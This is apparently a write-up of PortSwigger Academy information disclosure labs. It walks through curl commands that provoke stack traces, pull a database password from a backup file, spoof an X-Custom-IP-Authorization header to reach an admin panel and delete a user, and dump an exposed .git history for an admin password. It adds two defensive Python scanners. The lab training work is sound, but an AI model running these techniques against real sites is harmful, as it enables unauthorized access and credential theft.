Information Disclosure - [PortSwigger]

Marmeus

    Introduction

    This post compiles every apprentice and practitioner lab of the Information Disclosure topic from PortSwigger Academy.

    Information disclosure in error messages [Apprentice]

    Viewing a product uses the parameter productId, whose value is a number. By changing the number to letters, we obtain an error response with a full stack trace that ends with the framework's version.

    kali@kali:~$ curl -skq https://<LAB_DOMAIN>.web-security-academy.net/product?productId=sdadfads
    Internal Server Error: java.lang.NumberFormatException: For input string: "sdadfads"
            at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)
            at java.base/java.lang.Integer.parseInt(Integer.java:668)
            at java.base/java.lang.Integer.parseInt(Integer.java:786)
            at lab.l.e.e.w.E(Unknown Source)
            at lab.p.v.p.p.L(Unknown Source)
            at lab.p.v.z.a.q.a(Unknown Source)
            at lab.p.v.z.u.lambda$handleSubRequest$0(Unknown Source)
            at h.v.b.n.lambda$null$3(Unknown Source)
            at h.v.b.n.G(Unknown Source)
            at h.v.b.n.lambda$uncheckedFunction$4(Unknown Source)
            at java.base/java.util.Optional.map(Optional.java:260)
            at lab.p.v.z.u.c(Unknown Source)
            at lab.a.p.e.o.z(Unknown Source)
            at lab.p.v.l.z(Unknown Source)
            at lab.a.p.e.h.s(Unknown Source)
            at lab.a.p.e.h.C(Unknown Source)
            at h.v.b.n.lambda$null$3(Unknown Source)
            at h.v.b.n.G(Unknown Source)
            at h.v.b.n.lambda$uncheckedFunction$4(Unknown Source)
            at lab.a.g1.C(Unknown Source)
            at lab.a.p.e.h.x(Unknown Source)
            at lab.a.p.l.n.q(Unknown Source)
            at lab.a.p.o.M(Unknown Source)
            at lab.a.y.o(Unknown Source)
            at lab.a.y.J(Unknown Source)
            at lab.a.y.V(Unknown Source)
            at h.v.x.e.i.C(Unknown Source)
            at h.v.x.e.i.r(Unknown Source)
            at h.v.x.e.i.run(Unknown Source)
            at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
            at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
            at java.base/java.lang.Thread.run(Thread.java:833)
    
    Apache Struts 2 2.3.31
    
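    Added example (not part of the original write-up): a small response scanner that flags the kind of leak shown above, a raised exception class, stack frames and a framework version, so it can be run over proxy logs or in a CI check. The patterns and the sample bodies are constructed for this example.

```python
import re

# Signatures of verbose error output that should never reach a client.
# Constructed for this example; extend them with your own stack's patterns.
EXCEPTION_RE = re.compile(r"\b(javax?\.[\w.]+(?:Exception|Error))\b")
STACK_FRAME_RE = re.compile(r"^\s*at [\w.$<>/]+\([^)]*\)\s*$", re.MULTILINE)
VERSION_RE = re.compile(r"\b(Apache Struts|Apache Tomcat|Spring Boot)\s+v?(\d+(?:[ .]\d+)+)\b")


def scan_response(body: str) -> dict:
    """Report what an HTTP response body leaks about the server-side stack."""
    return {
        "exceptions": sorted(set(EXCEPTION_RE.findall(body))),
        "stack_frames": len(STACK_FRAME_RE.findall(body)),
        "versions": [f"{name} {ver}" for name, ver in VERSION_RE.findall(body)],
    }


def is_leaky(findings: dict) -> bool:
    """True when any signature fired; alert on this from a proxy log or CI run."""
    return bool(findings["exceptions"] or findings["stack_frames"] or findings["versions"])


# Constructed sample: a trimmed copy of the lab's error page.
LEAKY_BODY = """Internal Server Error: java.lang.NumberFormatException: For input string: "sdadfads"
        at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)
        at java.base/java.lang.Integer.parseInt(Integer.java:668)
        at lab.l.e.e.w.E(Unknown Source)

Apache Struts 2 2.3.31
"""

# What the same endpoint should return once fixed: a generic message, no internals.
SAFE_BODY = "Bad Request: productId must be a positive integer\n"

if __name__ == "__main__":
    for label, body in (("leaky", LEAKY_BODY), ("safe", SAFE_BODY)):
        findings = scan_response(body)
        print(label, "LEAK" if is_leaky(findings) else "ok", findings)
```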

    Information disclosure on debug page [Apprentice]

    To pass this lab we need to find a specific HTML comment. It can be found by reviewing the HTML of any page on the site, or by using the engagement tools Discover content or Find comments. The path you are looking for is /cgi-bin/phpinfo.php.

    Finally, you only have to access that path and look for the "SECRET_KEY" value.

    Source code disclosure via backup files [Apprentice]

    Looking at /robots.txt there is a path named /backup.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/robots.txt
    User-agent: *
    Disallow: /backup
    

    Looking inside that backup file, the database password can be obtained.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/backup/ProductTemplate.java.bak
    [...]
    
            ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
                    "org.postgresql.Driver",
                    "postgresql",
                    "localhost",
                    5432,
                    "postgres",
                    "postgres",
                    "xfpffqvyibw9z80y992e4vhiolckrdoc"
    [...]

    Authentication bypass via information disclosure [Apprentice]

    Sending a request with the TRACE method to any path on the site echoes the request back, and the echo contains a custom header, X-Custom-IP-Authorization.

    kali@kali:~$ curl -b "session=<WIENER_COOKIE>" -X TRACE https://<LAB_DOMAIN>.web-security-academy.net/admin
    TRACE /admin HTTP/1.1
    Host: <LAB_DOMAIN>.web-security-academy.net
    User-Agent: curl/7.81.0
    Accept: */*
    Cookie: session=AkRcO4SkiO40hpgg27zfvgZxXeJT2FBJ
    X-Custom-IP-Authorization: [REDACTED]

    The value corresponds to our public IP.

    kali@kali:~$ curl https://ifconfig.me
    [REDACTED]

    Trying to access the /admin panel shows the message "Admin interface only available to local users".

    So, by intercepting the request and adding the X-Custom-IP-Authorization header with the localhost IP, it is possible to bypass the IP filter and delete the user Carlos.

    kali@kali:~$ curl -sqD - -b "session=<WIENER_COOKIE>" -H "X-Custom-IP-Authorization: 127.0.0.1" https://<LAB_DOMAIN>.web-security-academy.net/admin/delete?username=carlos  | head
    HTTP/1.1 302 Found
    Location: /admin
    Connection: close
    Content-Length: 0

    Information disclosure in version control history [Practitioner]

    The web root exposes a .git repository.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/.git
    <html>
        <head>
            <title>Index of /.git</title>
            <style>
                table { margin: 1em; }
                td { padding: 0.2em; }
            </style>
        </head>
        <body>
            <h1>Index of /.git</h1>
            <table>
                <tr><th>Name</th><th>Size</th></tr>
                <tr><td><a href='/.git/branches/'>&lt;branches&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/description'>description</a></td><td>73B</td></tr>
                <tr><td><a href='/.git/hooks/'>&lt;hooks&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/info/'>&lt;info&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/refs/'>&lt;refs&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/HEAD'>HEAD</a></td><td>23B</td></tr>
                <tr><td><a href='/.git/config'>config</a></td><td>152B</td></tr>
                <tr><td><a href='/.git/objects/'>&lt;objects&gt;</a></td><td></td></tr>
                <tr><td><a href='/.git/index'>index</a></td><td>225B</td></tr>
                <tr><td><a href='/.git/COMMIT_EDITMSG'>COMMIT_EDITMSG</a></td><td>34B</td></tr>
                <tr><td><a href='/.git/logs/'>&lt;logs&gt;</a></td><td></td></tr>
            </table>
        </body>
    </html>

    You can use git-dumper to download the git repository.

    kali@kali:~$ mkcd /tmp/Repo
    kali@kali:/tmp/Repo$ git-dumper https://<LAB_DOMAIN>.web-security-academy.net/.git 

    Then, look at the commits.

    kali@kali:/tmp/Repo$ cat admin.conf 
    ADMIN_PASSWORD=env('ADMIN_PASSWORD')
    kali@kali:/tmp/Repo$ git log --oneline
    b3415ee (HEAD -> master) Remove admin password from config
    6431464 Add skeleton admin panel

    Because the password is not in the current version, let's check out the first commit.

    kali@kali:/tmp/Repo$ git checkout 6431464
    Note: switching to '6431464'.
    
    You are in 'detached HEAD' state. You can look around, make experimental
    changes and commit them, and you can discard any commits you make in this
    state without impacting any branches by switching back to a branch.
    
    If you want to create a new branch to retain commits you create, you may
    do so (now or later) by using -c with the switch command. Example:
    
      git switch -c <new-branch-name>
    
    Or undo this operation with:
    
      git switch -
    
    Turn off this advice by setting config variable advice.detachedHead to false
    
    HEAD is now at 6431464 Add skeleton admin panel

    After that, you can retrieve the Administrator's password to access the admin panel.

    kali@kali:/tmp/Repo$ cat admin.conf 
    ADMIN_PASSWORD=mskn9e2mjzjgjd1e8kz9
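    Added example (not from the write-up): a check that confirms an exposed repository from files every .git directory contains, rather than relying on a directory listing, and that does not raise a false alarm on servers that answer every path with a 200 "not found" page. The fetch function is injected, so the canned site responses below are constructed stand-ins for real requests.

```python
import re

# A real HEAD is either a symbolic ref or a bare 40-hex commit id.
HEAD_RE = re.compile(r"^(?:ref: refs/heads/\S+|[0-9a-f]{40})\s*$")


def check_git_exposure(fetch) -> dict:
    """fetch(path) -> (status, body). Returns which .git artefacts are readable."""
    evidence = []
    status, body = fetch("/.git/HEAD")
    if status == 200 and HEAD_RE.match(body):
        evidence.append("/.git/HEAD")
    status, body = fetch("/.git/config")
    if status == 200 and "[core]" in body:
        evidence.append("/.git/config")
    # A directory listing, as in the lab, makes dumping the whole history trivial.
    status, body = fetch("/.git/")
    if status == 200 and "Index of /.git" in body:
        evidence.append("/.git/ (directory listing)")
    return {"exposed": bool(evidence), "evidence": evidence}


# Constructed canned responses: the lab-like site, a soft-404 site, a fixed site.
EXPOSED_SITE = {
    "/.git/HEAD": (200, "ref: refs/heads/master\n"),
    "/.git/config": (200, "[core]\n\trepositoryformatversion = 0\n"),
    "/.git/": (200, "<html><h1>Index of /.git</h1></html>"),
}
SOFT_404_SITE = {  # answers 200 with a generic page for any path
    "/.git/HEAD": (200, "<html>Page not found</html>"),
    "/.git/config": (200, "<html>Page not found</html>"),
    "/.git/": (200, "<html>Page not found</html>"),
}
FIXED_SITE = {}  # .git blocked at the web server: everything 404s


def canned(site: dict):
    """Build a fetch function backed by a dict of canned responses."""
    return lambda path: site.get(path, (404, "Not Found"))


if __name__ == "__main__":
    for name, site in (("exposed", EXPOSED_SITE), ("soft404", SOFT_404_SITE), ("fixed", FIXED_SITE)):
        print(name, check_git_exposure(canned(site)))
```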